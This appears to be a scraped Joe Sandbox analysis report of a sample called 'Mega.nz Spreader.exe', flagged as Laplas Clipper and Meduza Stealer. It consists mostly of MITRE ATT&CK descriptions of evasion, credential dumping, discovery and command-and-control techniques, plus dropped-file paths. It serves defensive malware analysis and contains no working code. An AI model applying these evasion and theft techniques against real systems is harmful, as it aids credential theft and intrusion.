Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mega.nz Spreader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Laplas Clipper

Threatname: Meduza Stealer

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\leaf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svcupdater.exe.log

C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_decimal.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_hashlib.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_lzma.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_multiprocessing.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_queue.pyd

C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd

Windows Analysis Report
Mega.nz Spreader.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre